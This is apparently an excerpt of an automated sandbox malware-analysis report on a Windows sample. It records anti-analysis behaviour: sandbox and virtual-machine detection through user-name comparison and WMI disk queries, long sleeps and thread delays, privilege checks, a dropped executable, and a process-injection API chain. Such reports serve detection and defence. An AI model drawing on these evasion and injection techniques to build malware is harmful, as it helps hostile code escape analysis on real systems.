Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

7_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5703	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4152	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 2078	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 650	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 6767	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 7593	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 492	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 1216	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1640	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 1143	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1172	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 8794	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 410	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1553	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1224	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1695	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1651	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1691	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1595	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1486	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1761	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3368
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1770	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1771	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 467	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 442	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 446	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 440	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1580	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1580	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1540	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1624	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1588	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1337	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1558	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Window / User API: threadDelayed 397
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1462
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1428
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1792
Source: C:\Windows\System32\spoolsv.exe	Window / User API: threadDelayed 1252
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1229

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Windows\$nya-onimai2\qVrKPA.exe

Jump to dropped file

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_7-612
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_13-16436
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess	graph_7-615
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_7-573

Source: C:\Windows\System32\winlogon.exe	API coverage: 6.1 %
Source: C:\Windows\System32\lsass.exe	API coverage: 9.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.2 %
Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\dwm.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.8 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.2 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep count: 5703 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep count: 4152 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876	Thread sleep count: 2078 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876	Thread sleep time: -2078000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 320	Thread sleep count: 650 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 320	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876	Thread sleep count: 6767 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876	Thread sleep time: -6767000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064	Thread sleep count: 7593 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064	Thread sleep time: -7593000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7060	Thread sleep count: 492 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7060	Thread sleep time: -49200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064	Thread sleep count: 1216 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064	Thread sleep time: -1216000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2284	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2284	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2300	Thread sleep count: 1640 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2300	Thread sleep time: -164000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 8372	Thread sleep time: -114300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4068	Thread sleep count: 8794 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4068	Thread sleep time: -8794000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 1400	Thread sleep count: 410 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 1400	Thread sleep time: -41000s >= -30000s	Jump to behavior
